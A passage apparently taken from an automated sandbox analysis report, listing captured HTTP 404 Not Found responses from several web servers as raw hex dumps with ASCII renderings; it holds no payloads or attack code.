34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:52 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:55 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:57 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 13 Jan 2025 09:21:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 13 Jan 2025 09:21:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 13 Jan 2025 09:21:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 13 Jan 2025 09:21:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 272Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6f 76 7a 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.sovz.pro Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 13 Jan 2025 09:21:25 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-13T09:21:30.0626729Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:18 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:21 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 